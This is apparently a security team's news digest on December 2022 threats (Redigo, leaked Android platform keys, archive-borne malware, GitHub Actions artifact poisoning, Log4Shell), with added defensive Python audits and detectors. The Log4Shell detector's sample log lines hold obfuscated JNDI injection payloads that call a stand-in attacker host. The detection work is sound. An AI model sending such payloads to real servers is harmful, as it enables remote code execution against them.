December 2, 2022

Fortify Security Team

Title: New Go-Based Redigo Malware Targets Redis Servers
Date Published: December 1, 2022

https://securityaffairs.co/wordpress/139164/malware/redigo-malware-targets-redis-servers.html

Excerpt: “Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered a new Go-based malware that is used in a campaign targeting Redis servers. Threat actors are exploiting a critical vulnerability, tracked as CVE-2022-0543, in Redis (Remote Dictionary Server) servers. Redis (remote dictionary server) is an open source in-memory database and cache. The CVE-2022-0543 flaw is a Lua sandbox escape flaw that impacts Debian and Debian-derived Linux distributions. The vulnerability, which was rated 10 out of 10 for severity, could be exploited by a remote attacker with the ability to execute arbitrary Lua scripts to possibly escape the Lua sandbox and execute arbitrary code on the underlying machine. Juniper Threat Labs researchers reported that the Muhstik botnet has been observed targeting Redis servers exploiting the CVE-2022-0543 vulnerability.”
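
The sandbox escape in the excerpt is only reachable by a client that can already send EVAL, which is why the Redigo campaign looks for Redis instances that are reachable, unauthenticated and still allow scripting. The following Python audit, added here as an example and not code from AquaSec, the Redigo analysis or the Redis project, checks those preconditions from the text an operator gets back from INFO, CONFIG GET and ACL LIST. The replies embedded in it are constructed samples in the real reply formats, and the ACL rule replay models only the +/-@scripting, +/-@all and +/-eval rules.

```python
"""Audit a Redis instance for the exposure Redigo relies on.

Added example; not code from AquaSec, the Redigo analysis or the Redis
project. CVE-2022-0543 is only reachable by a client that can send EVAL, so
this checks the preconditions the campaign depends on: a server bound to all
interfaces, protected mode off, a default user with no password, and a user
allowed to run Lua scripts. The INFO, CONFIG GET and ACL LIST replies below
are constructed samples in the real Redis reply formats.
"""

# Constructed sample replies for an unhardened instance.
SAMPLE_INFO = """# Server
redis_version:6.0.16
os:Linux 5.10.0-19-amd64 x86_64
tcp_port:6379
"""
SAMPLE_CONFIG = {"bind": "0.0.0.0", "protected-mode": "no"}
SAMPLE_ACL = ["user default on nopass ~* &* +@all"]

# The same instance after hardening (constructed).
HARDENED_CONFIG = {"bind": "127.0.0.1 -::1", "protected-mode": "yes"}
HARDENED_ACL = [
    "user default off",
    "user app on >S3cret-app-password ~app:* &* +@all -@scripting -@dangerous",
]


def parse_info(text):
    """Turn INFO output (key:value lines, '#' section headers) into a dict."""
    out = {}
    for line in text.splitlines():
        if line and not line.startswith("#") and ":" in line:
            key, value = line.split(":", 1)
            out[key.strip()] = value.strip()
    return out


def acl_allows_scripting(acl_line):
    """True if an ACL LIST line lets the user call EVAL/EVALSHA.

    Redis applies +/- rules left to right, so replay them: +@all or
    +@scripting grants EVAL, -@all/-@scripting/-eval revokes it, and a later
    rule overrides an earlier one. Only these rules are modelled here.
    """
    allowed = False
    for token in acl_line.split():
        if token in ("+@all", "+@scripting", "+eval", "+evalsha"):
            allowed = True
        elif token in ("-@all", "-@scripting", "-eval"):
            allowed = False
    return allowed


def audit_redis(info_text, config, acl_lines):
    """Return a list of findings (empty means none of the preconditions hold)."""
    info = parse_info(info_text)
    findings = []
    binds = config.get("bind", "").split() or ["<all>"]   # empty bind = every interface
    if any(b in ("0.0.0.0", "*", "::", "<all>") for b in binds):
        findings.append("listens on all interfaces (bind=%s), port %s"
                        % (" ".join(binds), info.get("tcp_port", "?")))
    if config.get("protected-mode", "yes") != "yes":
        findings.append("protected-mode is off")
    for line in acl_lines:
        parts = line.split()
        user = parts[1] if len(parts) > 1 else "?"
        if "off" in parts[2:3]:
            continue                                       # disabled user
        if "nopass" in parts:
            findings.append("user %s needs no password" % user)
        if acl_allows_scripting(line):
            findings.append("user %s may run EVAL (Lua): add -@scripting until "
                            "the patched Debian package is installed" % user)
    return findings


if __name__ == "__main__":
    for finding in audit_redis(SAMPLE_INFO, SAMPLE_CONFIG, SAMPLE_ACL):
        print("-", finding)
```

Note that the version string in INFO cannot tell you whether Debian's fixed build is installed, because the flaw was in Debian's packaging of the Lua library rather than in upstream Redis; check the installed package version with the distribution's package manager instead, and keep the -@scripting rule in place for any user that does not need Lua.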

Title: Samsung, LG, Mediatek Certificates Compromised to Sign Android Malware
Date Published: December 1, 2022

https://www.bleepingcomputer.com/news/security/samsung-lg-mediatek-certificates-compromised-to-sign-android-malware/

Excerpt: “Multiple platform certificates used by Android OEM device vendors to digitally sign core system applications have also been used to sign Android apps containing malware. OEM Android device manufacturers use platform certificates, or platform keys, to sign devices’ core ROM images containing the Android operating system and associated apps. If apps, even malicious ones, are signed with the same platform certificate and assigned the highly privileged ‘android.uid.system’ user id, these apps will also gain system-level access to the Android device. These privileges provide access to sensitive permissions not normally granted to apps, such as managing ongoing calls, installing or deleting packages, gathering information about the device, and other highly sensitive actions. As shared in a now public report on the Android Partner Vulnerability Initiative (APVI) issue tracker, this abusive use of platform keys was discovered by Lukasz Siewierski, a Reverse Engineer on Google’s Android Security team.”
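
The two ingredients named in the excerpt, a platform-key signature and a manifest that requests android.uid.system, are both visible from the outside of an APK. The Python triage below is an added example, not code from Google's APVI report or the article: it parses the real output format of `apksigner verify --print-certs`, reads a manifest that has already been decoded to text (for instance with apktool), and flags the combination. The apksigner output, the manifest and every fingerprint in it are constructed placeholders, not the real digests of the leaked certificates.

```python
"""Triage an APK for the platform-key abuse described above.

Added example; not from Google's APVI report or the article. An app becomes
"system" when it is signed with the device vendor's platform key and its
manifest asks for android:sharedUserId="android.uid.system". This parses the
real output format of `apksigner verify --print-certs`, reads the manifest
(after it has been decoded from binary XML to text), and flags the
combination. The sample output, the manifest and every fingerprint are
constructed placeholders, not the real digests of the leaked certificates.
"""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Placeholder digests: fill from the APVI report / your OEM's published certificates.
LEAKED_PLATFORM_KEYS = {"b" * 64}

# Constructed sample of `apksigner verify --print-certs app.apk`.
SAMPLE_APKSIGNER = (
    "Signer #1 certificate DN: C=XX, O=Example OEM, CN=Example platform\n"
    "Signer #1 certificate SHA-256 digest: " + "b" * 64 + "\n"
    "Signer #1 certificate SHA-1 digest: " + "c" * 40 + "\n"
)


def build_manifest(shared_user_id=None):
    """Construct a minimal decoded AndroidManifest.xml."""
    attr = ' android:sharedUserId="%s"' % shared_user_id if shared_user_id else ""
    return ('<manifest xmlns:android="%s" package="com.example.reader"%s>'
            '<application android:label="Reader"/></manifest>' % (ANDROID_NS, attr))


def signer_sha256(apksigner_output):
    """Extract each signer's SHA-256 certificate digest, lower-cased."""
    return [d.lower() for d in re.findall(
        r"certificate SHA-256 digest:\s*([0-9a-fA-F]{64})", apksigner_output)]


def shared_user_id(manifest_xml):
    """Return the android:sharedUserId attribute, or None when absent."""
    return ET.fromstring(manifest_xml).get("{%s}sharedUserId" % ANDROID_NS)


def triage(apksigner_output, manifest_xml, preinstalled=False):
    """Return findings; `preinstalled` says the APK came from a system partition."""
    signers = signer_sha256(apksigner_output)
    leaked = [s for s in signers if s in LEAKED_PLATFORM_KEYS]
    uid = shared_user_id(manifest_xml)
    findings = []
    if leaked and not preinstalled:
        findings.append("signed with a leaked platform key but not preinstalled: treat as malicious")
    if uid == "android.uid.system":
        if leaked:
            findings.append("requests android.uid.system with a platform key: runs as system")
        else:
            findings.append("requests android.uid.system without a platform key: install would be "
                            "refused, but the sample is worth a look")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_APKSIGNER, build_manifest("android.uid.system")):
        print("-", finding)
```

On a fleet, the useful signal is the first finding: any APK that carries a known platform signature but was not shipped in the device's system image has no legitimate reason to exist, whether or not it also requests the system uid.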

Title: These File Types Are the Ones Most Commonly Used by Hackers to Hide Their Malware
Date Published: December 1, 2022

https://www.zdnet.com/article/these-file-types-are-the-ones-most-commonly-used-by-hackers-to-hide-their-malware/

Excerpt: “Careful when you click: Cyber criminals are hiding malicious payloads to make it more difficult for users – and anti-virus software – to detect. ZIP and RAR files have overtaken Office documents as the file most commonly used by cyber criminals to deliver malware, according to an analysis of real-world cyber attacks and data collected from millions of PCs. The research, based on customer data by HP Wolf Security, found in the period between July and September this year, 42% of attempts at delivering malware attacks used archive file formats, including ZIP and RAR. That means cyber attacks attempting to exploit ZIP and RAR formats are more common than those which attempt to deliver malware using Microsoft Office documents like Microsoft Word and Microsoft Excel files, which have long been the preferred method of luring victims into downloading malware. According to researchers, this marks the first time in over three years that archive files have surpassed Microsoft Office files as the most common means of delivering malware.”
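
Archives work for attackers because a gateway that only looks at the outer extension never sees the script inside, and a password supplied in the mail body stops it from looking at all. The Python inspector below is an added example, not code from HP Wolf Security or the article: it opens a ZIP attachment and flags the patterns worth blocking (executable or script entries, document-looking double extensions, nested archives, encrypted entries, and archives that do not parse). Only ZIP is handled, since RAR needs a third-party module; the sample archive is constructed in memory.

```python
"""Inspect ZIP attachments before delivery, rather than trusting the extension.

Added example; not code from HP Wolf Security or the article. It flags the
patterns that make archives attractive carriers: executable or script
payloads, document-looking double extensions, nested archives, and encrypted
entries (a password in the e-mail body defeats gateway scanning). Only ZIP is
handled because RAR needs a third-party module. The sample archive is
constructed in memory.
"""
import io
import zipfile

# Extensions that commonly carry the first-stage payload inside an archive.
RISKY_SUFFIXES = {".exe", ".dll", ".scr", ".js", ".jse", ".vbs", ".wsf", ".hta",
                  ".lnk", ".bat", ".cmd", ".ps1", ".iso", ".img", ".msi"}
NESTED_SUFFIXES = {".zip", ".rar", ".7z"}


def build_sample_zip(with_payload=True):
    """Construct a sample archive: a decoy document, optionally plus a
    double-extension script and a nested archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2022-11.pdf", b"%PDF-1.4 decoy")
        if with_payload:
            zf.writestr("Invoice_2022-11.pdf.js", b"// constructed stand-in for a dropper")
            zf.writestr("archive/inner.zip", b"PK\x05\x06" + b"\x00" * 18)  # empty nested zip
    return buf.getvalue()


def inspect_zip(data):
    """Return findings for a ZIP given as bytes; each key lists matching entry names."""
    findings = {"risky": [], "double_ext": [], "nested": [], "encrypted": [], "unparseable": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile as exc:
        findings["unparseable"].append(str(exc))
        return findings
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            basename = info.filename.rsplit("/", 1)[-1].lower()
            parts = basename.split(".")
            suffix = "." + parts[-1] if len(parts) > 1 else ""
            if info.flag_bits & 0x1:            # general purpose bit 0: entry is encrypted
                findings["encrypted"].append(info.filename)
            if suffix in RISKY_SUFFIXES:
                findings["risky"].append(info.filename)
                if len(parts) > 2:              # e.g. invoice.pdf.js
                    findings["double_ext"].append(info.filename)
            if suffix in NESTED_SUFFIXES:
                findings["nested"].append(info.filename)
    return findings


def verdict(findings):
    """Block when anything was flagged or the archive could not be parsed."""
    return "block" if any(findings.values()) else "allow"


if __name__ == "__main__":
    result = inspect_zip(build_sample_zip())
    print(verdict(result), result)
```

The encrypted-entry check reads the general purpose bit flag of each entry, so it fires even when the archive is otherwise unreadable; the usual policy is to quarantine such attachments rather than ask the user for the password.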

Title: Cuba Ransomware Actors Pocket $60m
Date Published: December 2, 2022

https://www.infosecurity-magazine.com/news/cuba-ransomware-actors-pocket-60m/

Excerpt: “A leading US security agency has warned of the continued threat posed by the Cuba ransomware variant, which has made its affiliates and developers $60m as of August. The US Cybersecurity and Infrastructure Security Agency (CISA) revealed in a new alert that the ransomware has compromised at least 100 entities worldwide, having doubled its victim count in the US since last December. The group and its affiliates mainly target financial services, government, healthcare, critical manufacturing and IT companies. Disappointingly, ransoms are increasingly being paid, CISA said. The group has demanded $145m to date in recorded attacks. Threat actors use one of several tried-and-tested techniques to gain initial access: phishing campaigns, vulnerability exploitation, compromised credentials and remote desktop protocol (RDP) tools. Once inside, the ransomware itself is distributed via a loader known as “Hancitor,” the report revealed. However, since spring this year, the group has modified some of its tactics, techniques and procedures (TTPs). It uses a dropper that writes a kernel driver to the file system called ApcHelper.sys, in order to terminate any security products running on victims’ machines. It also exploits CVE-2022-24521 to steal system tokens and elevate privileges, and CVE-2020-1472 to gain domain administrator privileges. CISA also cited Palo Alto Networks research linking the Cuba ransomware variant to the custom RomCom RAT for command and control (C2), and the Industrial Spy ransomware, on whose marketplace the group has sold stolen data.”

Title: Artifact Poisoning in GitHub Actions Imports Malware via Software Pipelines
Date Published: December 1, 2022

https://www.darkreading.com/application-security/artifact-poisoning-github-actions-malware-software-pipelines

Excerpt: “A vulnerability discovered in GitHub Actions could allow an attacker to poison a developer’s pipeline, highlighting the risk that insecure software pipelines pose. An attacker submitting changes to an open source repository on GitHub could cause downstream software projects that include the latest version of a component to compile updates with malicious code. That’s according to software supply chain security firm Legit Security, which said in an advisory published on Dec. 1 that this “artifact poisoning” weakness could affect software projects that use GitHub Actions — a service for automating development pipelines — by triggering the build process when a change is detected in a software dependency. The vulnerability is not theoretical: Legit Security simulated an attack on the project that manages Rust, causing the project to recompile using a customized — and malicious — version of the popular GCC software library, the company stated in the advisory.”
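
The weakness in the excerpt is a selection problem: a privileged workflow that downloads "the newest artifact with this name" has no way of knowing whether that artifact was produced by the repository's own run or by a pull request from a fork. The Python below is an added example, not Legit Security's proof of concept or the Rust project's workflow; it shows the vulnerable selection next to one that pins the artifact to the triggering run and to the repository itself. The artifact records are constructed in the shape of the GitHub REST API's actions/artifacts response, whose workflow_run block carries id, repository_id and head_repository_id; the numeric ids are assumed values.

```python
"""Select a build artifact in a workflow_run-triggered job without being poisoned.

Added example; not Legit Security's proof of concept or the Rust project's
workflow. It models the weakness the advisory describes: a privileged
workflow that downloads "the newest artifact with this name" can receive one
uploaded by a fork's pull-request run. The artifact records are constructed
in the shape of the GitHub REST API's actions/artifacts response, whose
workflow_run block carries id, repository_id and head_repository_id; the
ids themselves are assumed values.
"""

THIS_REPO_ID = 1001         # github.repository_id (assumed value)
TRIGGERING_RUN_ID = 5555    # github.event.workflow_run.id (assumed value)

# Constructed: a legitimate artifact from the repository's own run, then a
# newer one with the same name from a run whose head repository is a fork.
SAMPLE_ARTIFACTS = [
    {"id": 1, "name": "build-output", "expired": False,
     "created_at": "2022-11-30T10:00:00Z",
     "workflow_run": {"id": 5555, "repository_id": 1001,
                      "head_repository_id": 1001, "head_branch": "master"}},
    {"id": 2, "name": "build-output", "expired": False,
     "created_at": "2022-11-30T10:05:00Z",
     "workflow_run": {"id": 5556, "repository_id": 1001,
                      "head_repository_id": 2002, "head_branch": "feature"}},
]


def pick_latest_by_name(artifacts, name):
    """The vulnerable pattern: newest unexpired artifact with that name, from any run."""
    matches = [a for a in artifacts if a["name"] == name and not a.get("expired")]
    return max(matches, key=lambda a: a["created_at"], default=None)


def pick_from_triggering_run(artifacts, name, run_id, repo_id):
    """Hardened: the artifact must belong to the run that triggered this job,
    and that run's head repository must be this repository, not a fork."""
    for a in artifacts:
        run = a.get("workflow_run") or {}
        if (a["name"] == name and not a.get("expired")
                and run.get("id") == run_id
                and run.get("repository_id") == repo_id
                and run.get("head_repository_id") == repo_id):
            return a
    return None


if __name__ == "__main__":
    print("vulnerable picks id", pick_latest_by_name(SAMPLE_ARTIFACTS, "build-output")["id"])
    chosen = pick_from_triggering_run(SAMPLE_ARTIFACTS, "build-output",
                                      TRIGGERING_RUN_ID, THIS_REPO_ID)
    print("hardened picks id", chosen["id"] if chosen else None)
```

In the workflow itself the same gate belongs on the job: check that github.event.workflow_run.head_repository.full_name equals github.repository before doing anything with a write-capable token, and treat whatever is downloaded as untrusted input rather than something to execute.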

Title: Android Malware Infected 300,000 Devices to Steal Facebook Accounts
Date Published: December 1, 2022

https://www.bleepingcomputer.com/news/security/android-malware-infected-300-000-devices-to-steal-facebook-accounts/

Excerpt: “An Android malware campaign masquerading as reading and education apps has been underway since 2018, attempting to steal Facebook account credentials from infected devices. According to a new report by Zimperium, the campaign has infected at least 300,000 devices across 71 countries, primarily focusing on Vietnam. Some apps used for spreading the trojan, which Zimperium named ‘Schoolyard Bully,’ were previously on Google Play but have since been removed. However, Zimperium warns that the apps continue to be spread through third-party Android app stores. The Schoolyard Bully malware gets its name from masquerading as harmless and even beneficial educational apps. However, the main goal of the malware is to steal Facebook account credentials (email and password), account ID, username, device name, device RAM, and device API.”

Title: WhatsApp Files on Dark Web Show Millions of Records For Sale
Date Published: December 1, 2022

https://www.infosecurity-magazine.com/news/dark-web-show-millions-of-whatsapp/

Excerpt: “In mid-November, a threat actor posting on a dark web forum claimed to have stolen the personal information of almost 500 million WhatsApp users. Now, Check Point Research (CPR) has published a new advisory analyzing the exposed files and confirming the leak includes 360 million phone numbers from 108 countries. While CPR was unable to confirm the leaked numbers belonged to WhatsApp users, their analysis showed that the phone numbers varied in quantity among countries, ranging from 604 in Bosnia and Herzegovina to 35 million attributed to Italy. According to the document, the whole list went on sale for four days and is now being distributed for free among dark web users. “While the information on sale does not expose the content of any messages themselves, it is still worrying to see such a large volume of phone numbers for sale on the Dark Web. There is the potential that this information could be used as part of tailored phishing attacks in the future,” said Deryck Mitchelson, field CISO of EMEA at CPR. At the same time, Karol Paciorek, a security researcher from the computer security incident response team of the Polish financial sector (CSIRT KNF), claimed on Twitter on Tuesday that the leaked database is a re-use of an older 2019 Facebook breach.”

Title: Financial Organizations More Prone to Accidental Data Leakage
Date Published: December 2, 2022

https://www.helpnetsecurity.com/2022/12/02/financial-sector-cloud-security/

Excerpt: “Netwrix announced additional findings for the financial and banking sector from its global 2022 Cloud Security Report. Compared to other industries surveyed, financial institutions are much more concerned about users who have legitimate access to their cloud infrastructure. Indeed, 44 percent of respondents in this sector say their own IT staff poses the biggest risk to data security in the cloud and 47 percent worry about contractors and partners, compared to 30 percent and 36 percent respectively in other verticals surveyed. “Financial organizations experience accidental data leakage more often than companies in other verticals: 32 percent of them reported this type of security incident within the last 12 months, compared to the average of 25 percent. This is a good reason for them to be concerned about users who might unintentionally expose sensitive information. To address this threat, organizations need to implement a zero-standing privilege approach in which elevated access rights are granted only when they are needed and only for as long as needed,” comments Dirk Schrader, VP of security research at Netwrix. “Cloud misconfigurations are another common reason for accidental data leakage. Therefore, security teams must continually monitor the integrity of their cloud configurations, ideally with a dedicated solution that automates the process.” All sectors say phishing is the most common type of attack they experience. However, 91 percent of financial institutions say they can spot phishing within minutes or hours, compared to 82 percent of respondents in other verticals.”

Title: Android Keyboard Apps With 2 Million Downloads Can Remotely Hack Your Device
Date Published: December 2, 2022

https://securityaffairs.co/wordpress/139174/hacking/android-keyboard-apps-flaws.html

Excerpt: “Experts found multiple flaws in three Android Keyboard apps that can be exploited by remote attackers to compromise a mobile phone. Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively two million installs that are affected by multiple flaws (CVE-2022-45477, CVE-2022-45478, CVE-2022-45479, CVE-2022-45480, CVE-2022-45481, CVE-2022-45482, CVE-2022-45483) that can be exploited by attackers to compromise a mobile phone. Keyboard and mouse apps connect to a server on a desktop or laptop computer and transmit mouse and keyboard events to a remote server. These three Android apps (Lazy Mouse, PC Keyboard, and Telepad) are Keyboard apps available on the official Google Play Store and are used as remote keyboard and mouse. CyRC experts warn of weak or missing authentication mechanisms, missing authorization, and insecure communication vulnerabilities in the three apps. “An exploit of the authentication and authorization vulnerabilities could allow remote unauthenticated attackers to execute arbitrary commands. Similarly, an exploit of the insecure communication vulnerability exposes the user’s keystrokes, including sensitive information such as usernames and passwords.” reads the analysis published by CyRC.”

Title: One Year After Log4Shell, Most Firms Are Still Exposed to Attack
Date Published: December 1, 2022

https://www.darkreading.com/application-security/one-year-later-log4shell-exposed-attack

Excerpt: “Though there have been fewer than expected publicly reported attacks involving the vulnerability, nearly three-quarters of organizations remain exposed to it. The Log4j vulnerability continues to present a major threat to enterprise organizations one year after the Apache Software Foundation disclosed it last November — even though the number of publicly disclosed attacks targeting the flaw itself has been less than many might have initially expected. A high percentage of systems still remain unpatched against the flaw, and organizations face challenges in finding and remediating the issue and then preventing the flaw from being reintroduced into the environment, security researchers say. “The fact that Log4j is used in [nearly] 64% of Java applications and only 50% of those have updated to a fully fixed version means attackers will continue to target it,” says David Lindner, CISO at Contrast Security. “At least for now, attackers continue to have a field day in finding paths to exploit through Log4j.” The Log4j flaw (CVE-2021-44228), commonly referred to as Log4Shell, exists in Log4j’s Java Naming and Directory Interface (JNDI) function for data storage and retrieval. It gives remote attackers a trivially easy way to take control of vulnerable systems — a problem given that Log4J is used in virtually every Java application environment.”
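
One reason the flaw is still being exploited a year on is that detecting probes is harder than it looks: the `${jndi:` trigger is routinely hidden behind nested lookups that Log4j resolves before it ever reaches JNDI, so a plain substring search misses them. The Python detector below is an added example, not code from Contrast Security or the article; it folds the nesting tricks scanners use (lower/upper lookups and `${x:-default}` fallbacks, including the empty `${::-j}` form) from the inside out and then matches the JNDI lookup. The access-log lines it runs over are constructed samples.

```python
"""Detect Log4Shell lookup strings in application logs, obfuscation included.

Added example; not code from Contrast Security or the article. Scanners hide
the `${jndi:` trigger inside nested lookups that Log4j resolves before the
JNDI call, e.g. `${${lower:j}ndi:ldap://...}` or `${::-j}${::-n}...`, so a
plain substring match misses them. normalize() folds the nesting tricks the
probes rely on (lower/upper, `${x:-default}` fallbacks) from the inside out,
then is_log4shell_probe() matches. The log lines are constructed samples.
"""
import re

# An innermost ${...} (no nested braces); resolved repeatedly from the inside out.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nis|nds|http)", re.I)


def _resolve(body):
    """Evaluate one lookup body the way Log4j's substitutor would for the cases
    attackers use; return None for lookups this model does not evaluate."""
    if ":-" in body:                       # ${anything:-default}, including ${::-x}
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep:
        kind = kind.strip().lower()
        if kind == "lower":
            return arg.lower()
        if kind == "upper":
            return arg.upper()
    return None


def normalize(text, max_rounds=20):
    """Collapse nested lookups until nothing resolvable is left (or rounds run out)."""
    for _ in range(max_rounds):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = _INNER.sub(substitute, text)
        if not changed:
            break
    return text


def is_log4shell_probe(line):
    """True if the line contains a JNDI lookup once de-obfuscated."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line number, line) for every line that looks like a Log4Shell probe."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


# Constructed access-log samples: a benign request, three probes of increasing
# obfuscation, and a benign request that merely contains a ${...} placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Dec/2022:10:12:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Dec/2022:10:12:03 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.10:1389/a}"',
    '10.0.0.8 - - [01/Dec/2022:10:12:04 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.10/b} '
    'HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [01/Dec/2022:10:12:05 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.10/c}"',
    '10.0.0.6 - - [01/Dec/2022:10:12:06 +0000] "GET /price?amount=${total} HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOG):
        print(number, normalize(line))
```

Detection of probes tells you who is knocking, not whether anything answered; pair it with an inventory of log4j-core versions on disk and in container images, since the excerpt's point is that the library keeps being reintroduced through dependencies after it has been patched once.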
